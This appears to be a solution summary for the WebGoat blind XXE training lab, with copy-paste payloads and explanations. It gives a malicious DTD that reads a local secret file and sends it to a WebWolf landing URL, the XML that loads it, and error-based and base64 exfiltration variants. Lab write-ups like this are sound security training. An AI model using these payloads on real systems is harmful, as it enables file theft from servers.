====================================================================
BLIND XXE - COMPLETE SOLUTION SUMMARY
====================================================================

Challenge: Exfiltrate C:\Users\mahad\.webgoat-2025.3\XXE\nooniman\secret.txt

Method: Out-of-band XXE using WebWolf as exfiltration server

====================================================================
COPY-PASTE SOLUTION:
====================================================================

STEP 1: Create attack.dtd on WebWolf
-------------------------------------

File name: attack.dtd

Content:
<!ENTITY % file SYSTEM "file:///C:/Users/mahad/.webgoat-2025.3/XXE/nooniman/secret.txt">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://127.0.0.1:8002/WebWolf/landing?secret=%file;'>">
%eval;
%exfil;

How to upload:
1. Go to http://127.0.0.1:8002/WebWolf
2. Click "Files"
3. Upload attack.dtd with above content


STEP 2: Submit XXE to WebGoat
------------------------------

In WebGoat comment field, paste:

<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY % remote SYSTEM "http://127.0.0.1:8002/files/nooniman/attack.dtd">
  %remote;
]>
<comment>
  <text>Blind XXE Attack</text>
</comment>

(Change 'nooniman' to your username if different)


STEP 3: Check WebWolf
----------------------

1. WebWolf → "Incoming requests"
2. Look for: GET /WebWolf/landing?secret=[YOUR_SECRET]
3. Copy the secret value


STEP 4: Submit Secret
----------------------

In WebGoat, post new comment with ONLY the secret text
Lesson complete! ✅

====================================================================
WHY THIS WORKS:
====================================================================

1. %file reads secret.txt from disk

2. %eval creates a new entity %exfil that makes HTTP request:
   GET http://127.0.0.1:8002/WebWolf/landing?secret=[file_content]

3. %exfil; executes the HTTP request

4. WebWolf logs all incoming requests

5. You see the secret in WebWolf logs!

====================================================================
VISUAL FLOW:
====================================================================

WebGoat Parser
    ↓
Loads your XML
    ↓
Sees <!ENTITY % remote SYSTEM "http://127.0.0.1:8002/files/nooniman/attack.dtd">
    ↓
Downloads attack.dtd from WebWolf
    ↓
Processes: <!ENTITY % file SYSTEM "file:///.../secret.txt">
    ↓
Reads secret.txt → Contents = "MySecretPassword123"
    ↓
Processes: <!ENTITY % eval ...>
    ↓
Creates: <!ENTITY % exfil SYSTEM 'http://127.0.0.1:8002/WebWolf/landing?secret=MySecretPassword123'>
    ↓
Executes: %exfil;
    ↓
Makes HTTP Request → GET /WebWolf/landing?secret=MySecretPassword123
    ↓
WebWolf Logs Request
    ↓
You Check "Incoming Requests" → See: secret=MySecretPassword123
    ↓
Submit "MySecretPassword123" as comment
    ↓
✅ Lesson Complete!

====================================================================
KEY CONCEPTS:
====================================================================

Parameter Entity (%):
- Used inside DTD
- Processed immediately when declared
- Can reference other entities

Regular Entity (&):
- Used in XML content
- Replaced when referenced
- Cannot be used in DTD declarations

Out-of-Band (OOB):
- Data sent to external server (WebWolf)
- Bypasses "blind" limitation
- You control the external server

====================================================================
COMMON MISTAKES:
====================================================================

❌ Using & instead of % in DTD
✅ Use % for parameter entities in DTD

❌ Wrong file path: C:\Users\... (backslashes)
✅ Use forward slashes: C:/Users/...

❌ Wrong DTD URL: http://127.0.0.1:8002/attack.dtd
✅ Must be: http://127.0.0.1:8002/files/[username]/attack.dtd

❌ Submitting full XML as final answer
✅ Submit ONLY the secret value

❌ Not checking WebWolf "Incoming requests"
✅ Click "Incoming requests" to see logged data

====================================================================
TOOLS AVAILABLE:
====================================================================

xxe_blind_tool.html          - Interactive HTML tool
xxe_blind_guide.txt          - Complete guide
xxe_blind_quickstart.txt     - Quick reference
xxe_blind_summary.txt        - This file

====================================================================
TROUBLESHOOTING:
====================================================================

No request in WebWolf?
→ Check DTD is uploaded correctly
→ Verify DTD URL in XXE payload
→ Test: http://127.0.0.1:8002/files/[username]/attack.dtd

Parser error?
→ Check XML syntax
→ Try alternative endpoints (?data= or ?content=)
→ Use base64 encoding if special characters

Empty secret?
→ Verify file path is correct
→ Check username in path matches yours
→ File path must use forward slashes

WebWolf not accessible?
→ Make sure WebWolf is running
→ Try: http://192.168.254.112:8002 if localhost doesn't work

====================================================================
ALTERNATIVE EXFILTRATION METHODS:
====================================================================

Method 1 - Error-based (if OOB blocked):
-----------------------------------------
<!ENTITY % file SYSTEM "file:///C:/Users/mahad/.webgoat-2025.3/XXE/nooniman/secret.txt">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

Method 2 - Different parameter name:
-------------------------------------
<!ENTITY % file SYSTEM "file:///C:/Users/mahad/.webgoat-2025.3/XXE/nooniman/secret.txt">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://127.0.0.1:8002/landing?data=%file;'>">
%eval;
%exfil;

Method 3 - Base64 encoding:
----------------------------
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///C:/Users/mahad/.webgoat-2025.3/XXE/nooniman/secret.txt">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://127.0.0.1:8002/WebWolf/landing?secret=%file;'>">
%eval;
%exfil;

(Then decode from base64 before submitting)

====================================================================
SUCCESS = Secret appears in WebWolf requests!
====================================================================
